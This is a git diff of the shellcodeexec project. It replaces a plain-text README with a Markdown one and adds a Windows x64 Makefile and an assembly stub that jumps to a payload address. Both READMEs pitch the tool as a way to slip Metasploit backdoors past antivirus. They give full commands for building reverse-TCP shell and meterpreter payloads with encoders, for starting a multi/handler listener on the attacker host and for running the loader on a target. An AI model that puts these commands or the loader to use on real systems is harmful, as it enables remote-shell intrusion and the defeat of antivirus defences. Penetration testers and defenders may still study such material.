diff --git a/README b/README deleted file mode 100755 index 85620c3..0000000 --- a/README +++ /dev/null @@ -1,127 +0,0 @@ -= Short description = - -shellcodeexec is a small script to execute in memory a sequence of opcodes. - - -= Background = - -Most of the shellcode launchers out there, including proof of concepts -part of many "security" books, detail how to allocate a memory page as -readable/writable/executable on POSIX systems, copy over your shellcode -and execute it. This works just fine. However, it is limited to POSIX, -does not necessarily consider 64-bit architecture and Windows systems. - - -= Description = - -This script and the relevant project files (Makefile and Visual Studio -files) allow you to compile the tool once then run your shellcode across -different architectures and operating systems. - -Moreover, it solves a common real world issue: the target system's anti -virus software blocking a Metasploit-generated payload stager (either EXE -of ELF). Take for instance the following command line: - - $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe - -This generates a Metasploit payload stager, payload.exe, that as soon as -it lands on the AV-protected target system is recognized as malicious and -potentially blocked (depending on the on-access scan settings) by many -anti virus products. At the time of writing this text, 21 out 41 anti -viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it -multiple times with msfencode, less AV softwares detect it, still a lot. - -I have been surfing the Net and found some interesting tutorials and -guides about packing, compressing, obfuscating and applying IDA-foo to -portable executables et similar in order to narrow down the number of AV -products that can detect it as a malicious file. This is all interesting, -but does not stop few hard-to-die anti viruses to detect your backdoor. - -So the question is, how cool would it be to have a final solution to avoid -all this hassle? This is exactly where this tool comes into play! - - -= Features = - -shellcodeexec: - -* Can be compiled and works on POSIX (Linux/Unices) and Windows systems. - -* Can be compiled and works on 32-bit and 64-bit architectures. - -* As far as I know, no AV detect it as malicious. - -* Works in DEP/NX-enabled environments: it allocates the memory page where - it stores the shellcode as +rwx - Readable Writable and eXecutable. - -* It supports alphanumeric encoded payloads: you can pipe your binary-encoded - shellcode (generated for instance with Metasploit's msfpayload) to - Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the - BufferRegister variable to EAX registry where the address in memory of - the shellcode will be stored, to avoid get_pc() binary stub to be - prepended to the shellcode. - -* Spawns a new thread where the shellcode is executed in a structure - exception handler (SEH) so that if you wrap shellcodeexec into your own - executable, it avoids the whole process to crash in case of unexpected - behaviours. - - -= HowTo = - -1. Generate a Metasploit shellcode and encode it with the alphanumeric - encoder. For example for a Linux target: - - $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX - - Or for a Windows target: - - $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX - - -2. Execute the Metasploit multi/handler listener on your machine. For - example for a Linux target: - - $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E - - Or for a Windows target: - - $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E - - -3. Execute the alphanumeric-encoded shellcode with this tool. For example - on the Linux target: - - $ ./shellcodeexec - - Or, on the Windows target: - - C:\WINDOWS\Temp>shellcodeexec.exe - - -= License = - -This source code is free software; you can redistribute it and/or -modify it under the terms of the GNU Lesser General Public -License as published by the Free Software Foundation; either -version 2.1 of the License, or (at your option) any later version. - -This library is distributed in the hope that it will be useful, -but WITHOUT ANY WARRANTY; without even the implied warranty of -MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -Lesser General Public License for more details. - -You should have received a copy of the GNU Lesser General Public -License along with this library; if not, write to the Free Software -Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - - -= Author = - -Bernardo Damele A. G. - - -= Homepage = - -https://github.com/inquisb/shellcodeexec - diff --git a/README.md b/README.md new file mode 100755 index 0000000..bc77787 --- /dev/null +++ b/README.md @@ -0,0 +1,65 @@ +## Background + +Most of the shellcode launchers out there, including proof of concepts part of many "security" books, detail how to allocate a memory page as readable/writable/executable on POSIX systems, copy over your shellcode and execute it. This works just fine. However, it is limited to POSIX, does not necessarily consider 64-bit architecture and Windows systems. + +## Description + +shellcodeexec is an open source script to execute in memory a sequence of opcodes. + +This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems. + +Moreover, it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). Take for instance the following command line: + + $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe + +This generates a Metasploit payload stager, payload.exe, that as soon as it lands on the AV-protected target system is recognized as malicious and potentially blocked (depending on the on-access scan settings) by many anti virus products. At the time of writing this text, 21 out 41 anti viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it multiple times with msfencode, less AV softwares detect it, still a lot. + +I have been surfing the Net and found some interesting tutorials and guides about packing, compressing, obfuscating and applying IDA-foo to portable executables et similar in order to narrow down the number of AV products that can detect it as a malicious file. This is all interesting, but does not stop few hard-to-die anti viruses to detect your backdoor. + +So the question is, how cool would it be to have a final solution to avoid all this hassle? This is exactly where this tool comes into play! + +## Features + +shellcodeexec: + +* Can be compiled and works on POSIX (Linux/Unices) and Windows systems. +* Can be compiled and works on 32-bit and 64-bit architectures. +* As far as I know, no AV detect it as malicious. +* Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx - Readable Writable and eXecutable. +* It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode. +* Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours. + +## HowTo + +1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target: +``` +$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX +``` +Or for a Windows target: +``` +$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX +``` +2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target: +``` +$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E +``` +Or for a Windows target: +``` +$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E +``` +3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target: +``` +$ ./shellcodeexec +``` +Or, on the Windows target: +``` +C:\WINDOWS\Temp>shellcodeexec.exe +``` + +## License + +This source code is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. + +This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. + +You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA diff --git a/windows/shellcodeexec/Makefile.v64 b/windows/shellcodeexec/Makefile.v64 new file mode 100644 index 0000000..50edd90 --- /dev/null +++ b/windows/shellcodeexec/Makefile.v64 @@ -0,0 +1,8 @@ +shellcodeexecvc64.exe: shellcodeexec.obj __exec_payload.obj + link shellcodeexec.obj __exec_payload.obj + +shellcodeexec.obj: shellcodeexec.c + cl shellcodeexec.c /Os /TC /c + +__exec_payload.obj: __exec_payload.asm + ml64 __exec_payload.asm /c diff --git a/windows/shellcodeexec/__exec_payload.asm b/windows/shellcodeexec/__exec_payload.asm new file mode 100644 index 0000000..167e0ad --- /dev/null +++ b/windows/shellcodeexec/__exec_payload.asm @@ -0,0 +1,7 @@ +.CODE +__exec_payload PROC x:QWORD + mov rax, x + call QWORD PTR[rax] + ret +__exec_payload ENDP +END